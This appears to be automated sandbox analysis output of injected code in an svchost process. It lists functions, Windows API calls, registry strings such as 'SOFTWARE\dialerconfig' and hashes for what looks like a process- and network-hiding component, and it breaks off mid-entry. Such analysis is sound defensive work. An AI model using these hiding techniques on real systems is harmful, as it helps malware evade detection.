
Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000282B8DA347A
PathFindFileNameW.SHLWAPI ref: 00000282B8DA3489

Part of subcall function 00000282B8DA3930: StrCmpNIW.SHLWAPI ref: 00000282B8DA3948

Part of subcall function 00000282B8DA3878: GetModuleHandleW.KERNEL32 ref: 00000282B8DA3886
Part of subcall function 00000282B8DA3878: GetCurrentProcess.KERNEL32 ref: 00000282B8DA38B4
Part of subcall function 00000282B8DA3878: VirtualProtectEx.KERNEL32 ref: 00000282B8DA38D6
Part of subcall function 00000282B8DA3878: GetCurrentProcess.KERNEL32 ref: 00000282B8DA38F4
Part of subcall function 00000282B8DA3878: VirtualProtectEx.KERNEL32 ref: 00000282B8DA3915

CreateThread.KERNEL32 ref: 00000282B8DA34D7

Part of subcall function 00000282B8DA1EB4: GetCurrentThread.KERNEL32 ref: 00000282B8DA1EBF

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 38c59f307506c719695c359c43f09299a99c3bdb4d83eb89ff3eafdbfaf1bd84
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 2A1152786176C3C2F769A771A40E7956392AB54BCCF64C01B9B2E45D94EF79C44C8340

Function 00000282B8DA1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000282B8DA1650: GetProcessHeap.KERNEL32 ref: 00000282B8DA165B
Part of subcall function 00000282B8DA1650: HeapAlloc.KERNEL32 ref: 00000282B8DA166A
Part of subcall function 00000282B8DA1650: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA16DA
Part of subcall function 00000282B8DA1650: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA1707
Part of subcall function 00000282B8DA1650: RegCloseKey.ADVAPI32 ref: 00000282B8DA1721
Part of subcall function 00000282B8DA1650: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA1741
Part of subcall function 00000282B8DA1650: RegCloseKey.ADVAPI32 ref: 00000282B8DA175C
Part of subcall function 00000282B8DA1650: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA177C
Part of subcall function 00000282B8DA1650: RegCloseKey.ADVAPI32 ref: 00000282B8DA1797
Part of subcall function 00000282B8DA1650: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA17B7
Part of subcall function 00000282B8DA1650: RegCloseKey.ADVAPI32 ref: 00000282B8DA17D2
Part of subcall function 00000282B8DA1650: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA17F2

Sleep.KERNEL32 ref: 00000282B8DA1C43
SleepEx.KERNELBASE ref: 00000282B8DA1C49

Part of subcall function 00000282B8DA1650: RegCloseKey.ADVAPI32 ref: 00000282B8DA180D
Part of subcall function 00000282B8DA1650: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA182D
Part of subcall function 00000282B8DA1650: RegCloseKey.ADVAPI32 ref: 00000282B8DA1848
Part of subcall function 00000282B8DA1650: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA1868
Part of subcall function 00000282B8DA1650: RegCloseKey.ADVAPI32 ref: 00000282B8DA1883
Part of subcall function 00000282B8DA1650: RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA18A3
Part of subcall function 00000282B8DA1650: RegCloseKey.ADVAPI32 ref: 00000282B8DA18BE
Part of subcall function 00000282B8DA1650: RegCloseKey.ADVAPI32 ref: 00000282B8DA18C8

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 77288dfe16b70491bb355cbbd6ce0d318935a3c79eb74815585125c3c5ba4d2f
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 5331AF7D20368BD1FE54AF36D54936A13A5AB44BD8F24D0239F2F87E95EE34C8588350

Function 00000282B8DA3930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 00000282B8DA3948

Strings

dialer, xrefs: 00000282B8DA3941

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: 5416135c9f16e3731af99d452d6bba197197bece277d6c84f04d72dc62a2a2a4
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: D4D05E3871328BC6FF289FB188993602351AB04788F44C026CA1902914DF39898D8710

Function 00000282B8D72908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00000282B8D72A31

Memory Dump Source

Source File: 00000022.00000002.2666248495.00000282B8D70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8D70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8d70000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: b1d8f08e704a01682be5aa5f986f1a93fab30984039a5846d04ff9006a9032dd
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: E061BF3A7036E3C7EA688F269448769B391FB44B98F54C4269B5E07B89DF38D856C700

Function 00000282B934B860 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 00000282B934B8B5

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction ID: e793a75953900825685e84dd443c698bd9d778fb4a5c870224b08c10eea84f3d
Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
Instruction Fuzzy Hash: D7F01D7C703685C1FE556B72985939917A06F4AB4AF5DC430CD1AA63D2FE1CC94D4312

Non-executed Functions

Function 00000282B9342CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000282B9342D80
lstrlenW.KERNEL32 ref: 00000282B9342FBA

Part of subcall function 00000282B9341A14: OpenProcess.KERNEL32 ref: 00000282B9341A3A
Part of subcall function 00000282B9341A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000282B9341A58
Part of subcall function 00000282B9341A14: PathFindFileNameW.SHLWAPI ref: 00000282B9341A67
Part of subcall function 00000282B9341A14: lstrlenW.KERNEL32 ref: 00000282B9341A73
Part of subcall function 00000282B9341A14: StrCpyW.SHLWAPI ref: 00000282B9341A86
Part of subcall function 00000282B9341A14: CloseHandle.KERNEL32 ref: 00000282B9341A94

GetProcAddress.KERNEL32 ref: 00000282B9342D95

Part of subcall function 00000282B9341554: StrCmpIW.SHLWAPI ref: 00000282B9341585

Part of subcall function 00000282B9343930: StrCmpNIW.SHLWAPI ref: 00000282B9343948

StrCmpNIW.SHLWAPI ref: 00000282B9342DD8
lstrlenW.KERNEL32 ref: 00000282B9342F00

Strings

ntdll.dll, xrefs: 00000282B9342D79
NtQueryObject, xrefs: 00000282B9342D8B
\Device\Nsi, xrefs: 00000282B9342DCB

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: bfe24c3650b0a670496a93468899ec42c077f39bd006012f78d4c7f9752034f2
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: C4B1923A213A50C2EB648F35C58879963A4FB46B8EF5A9016EE0973794FF35CC88C740

Function 00000282B8DA2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000282B8DA2D80
lstrlenW.KERNEL32 ref: 00000282B8DA2FBA

Part of subcall function 00000282B8DA1A14: OpenProcess.KERNEL32 ref: 00000282B8DA1A3A
Part of subcall function 00000282B8DA1A14: K32GetModuleFileNameExW.KERNEL32 ref: 00000282B8DA1A58
Part of subcall function 00000282B8DA1A14: PathFindFileNameW.SHLWAPI ref: 00000282B8DA1A67
Part of subcall function 00000282B8DA1A14: lstrlenW.KERNEL32 ref: 00000282B8DA1A73
Part of subcall function 00000282B8DA1A14: StrCpyW.SHLWAPI ref: 00000282B8DA1A86
Part of subcall function 00000282B8DA1A14: CloseHandle.KERNEL32 ref: 00000282B8DA1A94

GetProcAddress.KERNEL32 ref: 00000282B8DA2D95

Part of subcall function 00000282B8DA1554: StrCmpIW.SHLWAPI ref: 00000282B8DA1585

Part of subcall function 00000282B8DA3930: StrCmpNIW.SHLWAPI ref: 00000282B8DA3948

StrCmpNIW.SHLWAPI ref: 00000282B8DA2DD8
lstrlenW.KERNEL32 ref: 00000282B8DA2F00

Strings

ntdll.dll, xrefs: 00000282B8DA2D79
\Device\Nsi, xrefs: 00000282B8DA2DCB
NtQueryObject, xrefs: 00000282B8DA2D8B

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: fd59619c194d07305fddd95577683919d513fa53e33f956a7e13dab36f26d92f
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 29B17B3A213692C1EB588F76C4487A9A3A5F744BC8F649027EF6D53F94DE35C988C340

Function 00000282B9347E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000282B9347E8C
RtlCaptureContext.NTDLL ref: 00000282B9347EB9
RtlLookupFunctionEntry.NTDLL ref: 00000282B9347ED3
RtlVirtualUnwind.NTDLL ref: 00000282B9347F14
IsDebuggerPresent.KERNEL32 ref: 00000282B9347F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000282B9347F89
UnhandledExceptionFilter.KERNEL32 ref: 00000282B9347F94

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: ad9f32da293d0b23af854ef2f847d7c0cbf15f132c796426e73c5c36bdebd116
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: D6315B76206B80CAEB609F70E8443ED7360F789749F44842ADA4E57BA9EF38C64CC710

Function 00000282B8DA7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000282B8DA7E8C
RtlCaptureContext.NTDLL ref: 00000282B8DA7EB9
RtlLookupFunctionEntry.NTDLL ref: 00000282B8DA7ED3
RtlVirtualUnwind.NTDLL ref: 00000282B8DA7F14
IsDebuggerPresent.KERNEL32 ref: 00000282B8DA7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000282B8DA7F89
UnhandledExceptionFilter.KERNEL32 ref: 00000282B8DA7F94

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 9453f357c76495fe9aef54c80e0717b62cdf653cd276f416e1ce4425f753e2fa
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 68311B76206AC1D9EB649F70E8447EE63A4F784788F54842ADB8D47B98EF38C64CC710

Function 00000282B934B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000282B934B585
RtlLookupFunctionEntry.NTDLL ref: 00000282B934B59D
RtlVirtualUnwind.NTDLL ref: 00000282B934B5D8
IsDebuggerPresent.KERNEL32 ref: 00000282B934B611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000282B934B61B
UnhandledExceptionFilter.KERNEL32 ref: 00000282B934B626

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 4dfa7bf8292a7b607eeb5d031cc850325496fbe146642c570d2590f318d8476d
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 7E31A23A206F80C6DB60CF35E84439E73A4F789799F544126EA9D57BA5EF38C549CB00

Function 00000282B8DAB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000282B8DAB585
RtlLookupFunctionEntry.NTDLL ref: 00000282B8DAB59D
RtlVirtualUnwind.NTDLL ref: 00000282B8DAB5D8
IsDebuggerPresent.KERNEL32 ref: 00000282B8DAB611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000282B8DAB61B
UnhandledExceptionFilter.KERNEL32 ref: 00000282B8DAB626

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 82ba924b96a6793555bca41a00ecd321e0767337a8d598e962bf39a312126ab6
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 0B312A3A216BC1D6DB648F35E84439E73A4F788798F544226EA9D47BA8DF38C5498B00

Function 00000282B934FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000282B934FF67
WriteFile.KERNEL32 ref: 00000282B935021E
WriteFile.KERNEL32 ref: 00000282B9350270
GetLastError.KERNEL32 ref: 00000282B9350372
GetLastError.KERNEL32 ref: 00000282B93503D2

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: ff0683d1b69e2931b671a72110532a2edee4e9f2369b90d2cf61d85cf5474681
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: D6E1BC3A716A80DAE710CB74D48839D7BB1F34A78DF148116DE4E67B9AEE39C51AC700

Function 00000282B8DAFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000282B8DAFF67
WriteFile.KERNEL32 ref: 00000282B8DB021E
WriteFile.KERNEL32 ref: 00000282B8DB0270
GetLastError.KERNEL32 ref: 00000282B8DB0372
GetLastError.KERNEL32 ref: 00000282B8DB03D2

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 3ffc8b72310f01c206edeb928e161442d867f3feb0c46754a33e9625b33a5935
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: F8E1A83AA06AC1DAE710CBB5D08879D7BA1F3457C8F148916EE5E57B99DE38C81AC700

Function 00000282B9341650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000282B934165B
HeapAlloc.KERNEL32 ref: 00000282B934166A

Part of subcall function 00000282B9341274: GetProcessHeap.KERNEL32 ref: 00000282B934127A
Part of subcall function 00000282B9341274: HeapAlloc.KERNEL32 ref: 00000282B9341289
Part of subcall function 00000282B9341274: GetProcessHeap.KERNEL32 ref: 00000282B93412A3
Part of subcall function 00000282B9341274: HeapAlloc.KERNEL32 ref: 00000282B93412B4

RegOpenKeyExW.ADVAPI32 ref: 00000282B93416DA
RegOpenKeyExW.ADVAPI32 ref: 00000282B9341707
RegCloseKey.ADVAPI32 ref: 00000282B9341721
RegOpenKeyExW.ADVAPI32 ref: 00000282B9341741
RegCloseKey.ADVAPI32 ref: 00000282B934175C
RegOpenKeyExW.ADVAPI32 ref: 00000282B934177C
RegCloseKey.ADVAPI32 ref: 00000282B9341797
RegOpenKeyExW.ADVAPI32 ref: 00000282B93417B7
RegCloseKey.ADVAPI32 ref: 00000282B93417D2
RegOpenKeyExW.ADVAPI32 ref: 00000282B93417F2
RegCloseKey.ADVAPI32 ref: 00000282B934180D
RegOpenKeyExW.ADVAPI32 ref: 00000282B934182D
RegCloseKey.ADVAPI32 ref: 00000282B9341848
RegOpenKeyExW.ADVAPI32 ref: 00000282B9341868
RegCloseKey.ADVAPI32 ref: 00000282B9341883
RegOpenKeyExW.ADVAPI32 ref: 00000282B93418A3
RegCloseKey.ADVAPI32 ref: 00000282B93418BE
RegCloseKey.ADVAPI32 ref: 00000282B93418C8

Part of subcall function 00000282B93412C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000282B9341326
Part of subcall function 00000282B93412C8: GetProcessHeap.KERNEL32 ref: 00000282B9341334
Part of subcall function 00000282B93412C8: HeapAlloc.KERNEL32 ref: 00000282B9341345
Part of subcall function 00000282B93412C8: RegEnumValueW.ADVAPI32 ref: 00000282B93413A1
Part of subcall function 00000282B93412C8: GetProcessHeap.KERNEL32 ref: 00000282B93413E9
Part of subcall function 00000282B93412C8: HeapAlloc.KERNEL32 ref: 00000282B93413F7
Part of subcall function 00000282B93412C8: GetProcessHeap.KERNEL32 ref: 00000282B934141B
Part of subcall function 00000282B93412C8: HeapFree.KERNEL32 ref: 00000282B9341429
Part of subcall function 00000282B93412C8: lstrlenW.KERNEL32 ref: 00000282B9341432
Part of subcall function 00000282B93412C8: GetProcessHeap.KERNEL32 ref: 00000282B9341440
Part of subcall function 00000282B93412C8: HeapAlloc.KERNEL32 ref: 00000282B934144E

Strings

paths, xrefs: 00000282B93417B0
tcp_remote, xrefs: 00000282B9341861
tcp_local, xrefs: 00000282B9341826
service_names, xrefs: 00000282B93417EB
pid, xrefs: 00000282B934173A
process_names, xrefs: 00000282B9341775
SOFTWARE\dialerconfig, xrefs: 00000282B93416BA
udp, xrefs: 00000282B934189C
startup, xrefs: 00000282B93416FD

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: d88611fa17d72bf5cd1d7bb87feedcf6e191963232b24d324c998c037ff2cbe0
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 2E71F83A213E50C6EB109F75E85979D27A4F799B8EF459111DA4EA7B29FE38C448C300

Function 00000282B8DA1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000282B8DA165B
HeapAlloc.KERNEL32 ref: 00000282B8DA166A

Part of subcall function 00000282B8DA1274: GetProcessHeap.KERNEL32 ref: 00000282B8DA127A
Part of subcall function 00000282B8DA1274: HeapAlloc.KERNEL32 ref: 00000282B8DA1289
Part of subcall function 00000282B8DA1274: GetProcessHeap.KERNEL32 ref: 00000282B8DA12A3
Part of subcall function 00000282B8DA1274: HeapAlloc.KERNEL32 ref: 00000282B8DA12B4

RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA16DA
RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA1707
RegCloseKey.ADVAPI32 ref: 00000282B8DA1721
RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA1741
RegCloseKey.ADVAPI32 ref: 00000282B8DA175C
RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA177C
RegCloseKey.ADVAPI32 ref: 00000282B8DA1797
RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA17B7
RegCloseKey.ADVAPI32 ref: 00000282B8DA17D2
RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA17F2
RegCloseKey.ADVAPI32 ref: 00000282B8DA180D
RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA182D
RegCloseKey.ADVAPI32 ref: 00000282B8DA1848
RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA1868
RegCloseKey.ADVAPI32 ref: 00000282B8DA1883
RegOpenKeyExW.ADVAPI32 ref: 00000282B8DA18A3
RegCloseKey.ADVAPI32 ref: 00000282B8DA18BE
RegCloseKey.ADVAPI32 ref: 00000282B8DA18C8

Part of subcall function 00000282B8DA12C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000282B8DA1326
Part of subcall function 00000282B8DA12C8: GetProcessHeap.KERNEL32 ref: 00000282B8DA1334
Part of subcall function 00000282B8DA12C8: HeapAlloc.KERNEL32 ref: 00000282B8DA1345
Part of subcall function 00000282B8DA12C8: RegEnumValueW.ADVAPI32 ref: 00000282B8DA13A1
Part of subcall function 00000282B8DA12C8: GetProcessHeap.KERNEL32 ref: 00000282B8DA13E9
Part of subcall function 00000282B8DA12C8: HeapAlloc.KERNEL32 ref: 00000282B8DA13F7
Part of subcall function 00000282B8DA12C8: GetProcessHeap.KERNEL32 ref: 00000282B8DA141B
Part of subcall function 00000282B8DA12C8: HeapFree.KERNEL32 ref: 00000282B8DA1429
Part of subcall function 00000282B8DA12C8: lstrlenW.KERNEL32 ref: 00000282B8DA1432
Part of subcall function 00000282B8DA12C8: GetProcessHeap.KERNEL32 ref: 00000282B8DA1440
Part of subcall function 00000282B8DA12C8: HeapAlloc.KERNEL32 ref: 00000282B8DA144E

Strings

service_names, xrefs: 00000282B8DA17EB
paths, xrefs: 00000282B8DA17B0
startup, xrefs: 00000282B8DA16FD
udp, xrefs: 00000282B8DA189C
tcp_local, xrefs: 00000282B8DA1826
pid, xrefs: 00000282B8DA173A
tcp_remote, xrefs: 00000282B8DA1861
process_names, xrefs: 00000282B8DA1775
SOFTWARE\dialerconfig, xrefs: 00000282B8DA16BA

Memory Dump Source

Source File: 00000022.00000002.2666614413.00000282B8DA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B8DA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b8da0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 0f7de88245bc6712838b462fab7ae0625686cce2dc05c747cacb543ef6c38af0
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: FE71093A313A96D5EB109F75E898B9927A4FB84BDCF409116DA4E47E68DF38C449C300

Function 00000282B93412C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000282B9341326
GetProcessHeap.KERNEL32 ref: 00000282B9341334
HeapAlloc.KERNEL32 ref: 00000282B9341345
RegEnumValueW.ADVAPI32 ref: 00000282B93413A1

Part of subcall function 00000282B9341554: StrCmpIW.SHLWAPI ref: 00000282B9341585

GetProcessHeap.KERNEL32 ref: 00000282B93413E9
HeapAlloc.KERNEL32 ref: 00000282B93413F7
GetProcessHeap.KERNEL32 ref: 00000282B934141B
HeapFree.KERNEL32 ref: 00000282B9341429
lstrlenW.KERNEL32 ref: 00000282B9341432
GetProcessHeap.KERNEL32 ref: 00000282B9341440
HeapAlloc.KERNEL32 ref: 00000282B934144E
StrCpyW.SHLWAPI ref: 00000282B9341470
GetProcessHeap.KERNEL32 ref: 00000282B9341485
HeapFree.KERNEL32 ref: 00000282B9341493

Strings

d, xrefs: 00000282B9341365

Memory Dump Source

Source File: 00000022.00000002.2667466358.00000282B9340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000282B9340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_282b9340000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: c428c88f3f887425ee7acc6c2e6c9484590b296f266cef326f0471ea6dbd345b
